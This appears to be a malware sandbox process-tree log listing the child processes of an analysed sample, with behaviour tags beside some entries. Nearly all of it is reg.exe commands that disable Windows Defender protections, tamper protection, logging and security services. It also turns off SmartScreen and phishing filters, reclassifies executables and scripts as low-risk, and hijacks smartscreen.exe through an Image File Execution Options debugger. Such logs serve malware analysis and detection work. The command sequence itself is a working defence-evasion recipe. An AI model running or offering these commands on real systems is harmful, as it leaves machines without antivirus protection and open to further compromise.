C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f /reg:648⤵PID:3156
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f8⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:4780
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f8⤵PID:5772
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f /reg:648⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f8⤵PID:4108
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f /reg:648⤵PID:1412
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f8⤵PID:4104
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d "00000001" /f /reg:648⤵PID:4412
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:3924
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f /reg:648⤵
- Modifies Windows Defender notification settings
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f8⤵
- Modifies Windows Defender notification settings
PID:1804
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f8⤵
- Modifies Windows Defender notification settings
PID:3372
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:5232
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:1856
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f8⤵
- Modifies Windows Defender notification settings
PID:5244
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f8⤵
- Modifies Windows Defender notification settings
PID:3564
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:5488
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f8⤵PID:5528
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:648⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f8⤵PID:2160
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:648⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f8⤵PID:4168
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:648⤵PID:2288
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:648⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:648⤵PID:4304
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRawWriteNotification /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:5640
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:5584
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:5068
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:228
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:4324
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1556
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:4992
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:4968
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d "0" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:2300
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableInformationProtectionControl /t REG_DWORD /d "0" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1096
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d "1" /f /reg:648⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:812
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:5064
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f /reg:648⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f8⤵PID:3008
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f /reg:648⤵PID:2468
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f8⤵PID:3732
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d "0" /f /reg:648⤵PID:5180
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d "0" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:5196
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:5624
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f8⤵PID:2060
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d "8" /f /reg:648⤵PID:4432
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:5712
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:5988
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f /reg:648⤵PID:5200
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f8⤵PID:656
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f /reg:648⤵PID:4988
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f8⤵
- System Location Discovery: System Language Discovery
PID:4932
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f /reg:648⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f8⤵PID:320
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f /reg:648⤵PID:4860
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f8⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:5032
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f /reg:648⤵
- Modifies Windows Defender TamperProtection settings
PID:5444
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f8⤵
- Modifies Windows Defender TamperProtection settings
PID:3972
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies security service
PID:2316
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:648⤵PID:4624
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:5648
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:4836
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:5908
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:544
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- System Location Discovery: System Language Discovery
PID:3780
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:5268
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4724
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:5416
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:1388
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:4840
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:4900
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:3244
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:3224
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:5084
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:3772
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:3144
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies security service
PID:1932
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:6012
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:5856
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:4444
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f8⤵
- Modifies security service
PID:1920
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f8⤵
- System Location Discovery: System Language Discovery
PID:4632
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:5948
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:4124
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:3932
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:3600
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:3164
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:3020
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:1728
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies security service
PID:1380
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f8⤵
- System Location Discovery: System Language Discovery
PID:5324
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f8⤵
- System Location Discovery: System Language Discovery
PID:464
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:5844
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:2816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"8⤵PID:6124
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f9⤵PID:5296
-
-
C:\Windows\SysWOW64\find.exefind /i "webthreatdefusersvc"9⤵PID:1800
-
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f /reg:648⤵PID:1864
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f /reg:648⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1160
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f /reg:648⤵PID:5512
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f /reg:648⤵PID:736
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f /reg:648⤵PID:60
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f /reg:648⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f /reg:648⤵PID:5552
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f8⤵PID:5932
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f8⤵
- System Location Discovery: System Language Discovery
PID:5264
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f /reg:648⤵PID:5816
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f /reg:648⤵PID:4728
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f /reg:648⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f /reg:648⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f /reg:648⤵PID:724
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f8⤵
- System Location Discovery: System Language Discovery
PID:760
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f8⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3100
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f8⤵
- System Location Discovery: System Language Discovery
PID:2512
